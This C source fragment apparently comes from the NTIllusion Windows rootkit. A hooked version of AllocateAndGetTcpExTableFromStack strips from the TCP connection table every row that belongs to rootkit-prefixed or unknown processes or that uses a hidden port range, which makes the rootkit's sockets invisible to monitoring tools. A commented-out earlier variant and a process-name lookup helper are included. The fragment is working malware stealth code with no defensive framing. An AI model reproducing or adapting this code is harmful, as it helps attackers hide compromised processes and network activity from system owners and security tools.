  DWORD flags)
{
	FARPROC fhtons;
	HINSTANCE hDll, hDll2;
	DWORD err=0, i=0, j=0; // error handler, TcpTable walk index, TcpTable sort index
	char psname[512];	   // process name
	u_long LocalPort=0, RemotePort=0;

	
	OutputString("[!!]	AllocateAndGetTcpExTableFromStack \n");
	hDll = LoadLibrary("wsock32.dll");
	if(!hDll)
	{
		OutputString("[!]	!hDll\n");
		return 0;
	}
	
	fhtons = (FARPROC) fGetProcAddress(hDll, "htons");
	if(!fhtons)
	{
		OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
		return 0;
	}
	OutputString("[!!]	2\n");
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()

	hDll2 = LoadLibrary( "iphlpapi.dll");
	if(!hDll2)
	{
		OutputString("[!]	!hDll2\n");
		return 0;
	}
	if(!fAllocateAndGetTcpExTableFromStack) 
	{
		fAllocateAndGetTcpExTableFromStack = (FARPROC) fGetProcAddress( hDll2, 
				"AllocateAndGetTcpExTableFromStack" );
		if(!fAllocateAndGetTcpExTableFromStack)
		{
			OutputString("[!!]	Can't resolve AllocateAndGetTcpExTableFromStack (GetProcAddress)\n");
			return 0;
		}
	}

	OutputString("[!!]	3\n");

	// Call genuine function ...
	err = fAllocateAndGetTcpExTableFromStack(pTcpTable, bOrder, heap, zero, flags);
	if(err)
	{
		ShowError();
		//(*pTcpTable) = 0x00;
		//FreeHeap(heap, );
/*
		while(1)
		{
			Sleep(1000);
			OutputString("loop() \n");
		}
*/
		// in the case of an error, return it
		// permet de survivre, meme si on perdle contact, on filtre toujours
		// appels entrelac閟 ??
		return err;	
	}

	OutputString("[!!]	AllocateAndGetTcpExTableFromStack : checking ports\n");
	//sprintf(tmp, "'%d'\n", ((*pTcpTable)->dwNumEntries));
	//OutputString("[%d]\n", tmp);
	//OutputString("[%d]\n", pTcpTable);
	//((*pTcpTable)->dwNumEntries)

	// ... and start to filter unwanted rows. This will hide all opened/listening/connected/closed/... sockets
	// for each process...
	for(i = 0; i < ((*pTcpTable)->dwNumEntries); j=i) 
	{
		OutputString("#	AllocateAndGetTcpExTableFromStack loop i=%d\n", i);
		//memset(psname, 0, 512);

		GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, (char*)psname);
		LocalPort	= (u_short) fhtons((u_short)(*pTcpTable)->table[i].dwLocalPort);
		RemotePort	= (u_short) fhtons((u_short)(*pTcpTable)->table[i].dwRemotePort);
		OutputString("#	AllocateAndGetTcpExTableFromStack %s %d<=>%d\n", (char*)psname, LocalPort, RemotePort);

		if( !_strnicmp((char*)psname, RTK_FILE_CHAR, strlen(RTK_FILE_CHAR))	// RTK_FILE_CHAR prefix : hidden process ?
			|| !_strnicmp((char*)psname, NTILLUSION_PROCESS_NOTFOUND, strlen(NTILLUSION_PROCESS_NOTFOUND))	// process not found ?
			|| (( LocalPort	>= RTK_PORT_HIDE_MIN) && ( LocalPort <= RTK_PORT_HIDE_MAX))		//local port is in hidden range ?
			|| ((RemotePort	>= RTK_PORT_HIDE_MIN) && (RemotePort <= RTK_PORT_HIDE_MAX)) )	//remote port is in hidden range ?
		{
			//if(VERBOSE_STEALTH) 
			OutputString("[!] hidden :\n");
			OutputString("[!] NTIllusion made a TCP socket hidden for process %s (%d)\n", (char*)psname, (*pTcpTable)->table[i].dwProcessId);
			// we move all rows left one position lower in TcpTable array (8=>7, 7=>6, 6=>5 ...)
			// this leads to the wipe of the row that contains a "hidden process"
			for(j=i; j<((*pTcpTable)->dwNumEntries); j++){
				memcpy( (&((*pTcpTable)->table[j])), (&((*pTcpTable)->table[j+1])),sizeof(MIB_TCPEXROWEx));
			}
			// clear last row
			memset( (&((*pTcpTable)->table[(((*pTcpTable)->dwNumEntries)-1)])), 0, sizeof(MIB_TCPEXROWEx));
			((*pTcpTable)->dwNumEntries)-=1;  // decrease number of rows by one
			// do the job again for the current row, that may also contain a hidden process
			continue;
		}

	  // this row was ok, jump to the next
		i++;

	}
	// We may free the x skipped & unused TCP rows (x=(GenuineNumberOfRows-((*pTcpTable)->dwNumEntries)))
	// that begin at TcpTable index number ((*pTcpTable)->dwNumEntries)-1)
  return err;
}

/*
DWORD WINAPI MyAllocateAndGetTcpExTableFromStack( 
  PMIB_TCPEXTABLE *pTcpTable,  // buffer for the connection table
  BOOL bOrder,               // sort the table?
  HANDLE heap,
  DWORD zero,
  DWORD flags)
{

	FARPROC fhtons;
	HINSTANCE hDll, hDll2;
	DWORD err=0, i=0, j=0; // error handler, TcpTable walk index, TcpTable sort index
	char psname[512];	   // process name
	char tmp[512];
	u_long LocalPort=0, RemotePort=0;

	
	OutputString("[!!]	AllocateAndGetTcpExTableFromStack \n");
	hDll = LoadLibrary("wsock32.dll");
	if(!hDll)
	{
		OutputString("[!]	!hDll\n");
		return 0;
	}
	
	fhtons = (FARPROC) GetProcAddress(hDll, "htons");
	if(!fhtons)
	{
		OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
		return 0;
	}
	OutputString("[!!]	2\n");
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()

	hDll2 = LoadLibrary( "iphlpapi.dll");
	if(!hDll2)
	{
		OutputString("[!]	!hDll2\n");
		return 0;
	}
	if(!fAllocateAndGetTcpExTableFromStack) 
	{
		fAllocateAndGetTcpExTableFromStack = (FARPROC) GetProcAddress( hDll2, 
				"AllocateAndGetTcpExTableFromStack" );
		if(!fAllocateAndGetTcpExTableFromStack)
		{
			OutputString("[!!]	Can't resolve AllocateAndGetTcpExTableFromStack (GetProcAddress)\n");
			return 0;
		}
	}

	OutputString("[!!]	3\n");


	// Call genuine function ...
	err = fAllocateAndGetTcpExTableFromStack(pTcpTable, bOrder, heap, zero, flags);
	OutputString("[!!] 4\n");
	if(err)
	{
		OutputString("[ERROR] exiting (fAllocateAndGetTcpExTableFromStack() returned an error)\n");
		return err;	// on the case of an error, return it
	}
	
	OutputString("[!!] 5 (err=%d, lasterror=%d)\n", err, GetLastError());

	// ... and start to filter unwanted rows. This will hide all opened/listening/connected/closed/... sockets
	// for every process whose name is starting by RTK_PROCESS_CHAR
	for(i = 0; i < (*pTcpTable)->dwNumEntries; j=i) {
		OutputString("[!!] i=%d\n", i);
		memset(psname, 0, 512);

		GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, (char*)psname);

		if(( strstr((char*)psname, "_nti")!=0)) 
		{
			// we move all rows left one position lower in TcpTable array (8=>7, 7=>6, 6=>5 ...)
			// this leads to the wipe of the row that contains a "hidden process"
			for(j=i; j<((*pTcpTable)->dwNumEntries); j++){
				memcpy( (&((*pTcpTable)->table[j])), (&((*pTcpTable)->table[j+1])),sizeof(MIB_TCPEXROW));
			}
			// clear last row
			memset( (&((*pTcpTable)->table[(((*pTcpTable)->dwNumEntries)-1)])), 0, sizeof(MIB_TCPEXROW));
			((*pTcpTable)->dwNumEntries)-=1;  // decrease number of rows by one
			// do the job again for the current row, that may also contain a hidden process
			continue;
		}
		// this row was ok, jump to the next
		i++;
	}
	// We may free the x skipped & unused TCP rows (x=(GenuineNumberOfRows-((*pTcpTable)->dwNumEntries)))
	// that begin at TcpTable index number ((*pTcpTable)->dwNumEntries)-1)
  return err;
}
*/

// GetProcessNamebyPid: kInject remixed
// There is a problem when a process tries to get the real name of a "hidden" process
// by using its PID and the Toolhelp32 functions. This is probably caused by the fact
// that these functions rely on a hijacked version of NtQuerySystemInformation. (These
// functions don't use GetProcAddress to retrieve its real address.)
// So any unknown process must be considered a hidden process.
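// Resolve the executable name of the process whose id is pId through a Toolhelp32
// snapshot. On success the name is copied into `name` and 1 is returned; on any
// failure (library or API resolution, snapshot creation, or no entry with that PID)
// `name` holds NTILLUSION_PROCESS_NOTFOUND and 0 is returned.
//
// `name` carries no size in this interface, so the caller must provide at least
// sizeof(PROCESSENTRY32.szExeFile) (MAX_PATH) bytes; the in-file caller passes a
// 512-byte buffer. Every handle acquired here is released on every return path.
int GetProcessNamebyPid(DWORD pId, char* name)
{
    HINSTANCE   hLib;
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;
    int found = 0;
    //Functions pointers :
    FARPROC fCreateToolhelp32Snapshot;
    FARPROC fProcess32First;
    FARPROC fProcess32Next;

    // Default result: whatever fails below, the caller sees the "not found" marker.
    strcpy(name, (char*)NTILLUSION_PROCESS_NOTFOUND);

    hLib = LoadLibrary("Kernel32.DLL");
    if(!hLib)
        return 0;

    //Functions addresses :
    fCreateToolhelp32Snapshot = (FARPROC) GetProcAddress( hLib,"CreateToolhelp32Snapshot");
    fProcess32First = (FARPROC) GetProcAddress( hLib, "Process32First" );
    fProcess32Next = (FARPROC) GetProcAddress( hLib, "Process32Next" );
    if(!fCreateToolhelp32Snapshot || !fProcess32First || !fProcess32Next)
        goto out_lib;   // calling a NULL FARPROC would dereference NULL

    PEntry.dwSize = sizeof(PROCESSENTRY32);     //Set Size of structure before use
    hTool32 = (HANDLE)fCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //Create SnapShot
    if(hTool32 == INVALID_HANDLE_VALUE)         // snapshot failure is signalled this way, not with NULL
        goto out_lib;

    // Process32First/Process32Next return FALSE once the snapshot is exhausted (or on
    // error), so a single loop covers the first entry and all following ones; the
    // previous version re-tested the last entry after the loop, which was redundant.
    if(fProcess32First(hTool32, &PEntry))
    {
        do
        {
            if(PEntry.th32ProcessID == pId)
            {
                // szExeFile is a fixed MAX_PATH array filled by Toolhelp, so this copy is
                // bounded by that size (see the buffer requirement on `name` above).
                strcpy(name, PEntry.szExeFile);
                found = 1;
                break;
            }
        } while( fProcess32Next(hTool32, &PEntry) );
    }

    CloseHandle(hTool32);   // the snapshot handle was never released before
out_lib:
    FreeLibrary(hLib);      // previously leaked on the "found" return paths
    return found;
}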
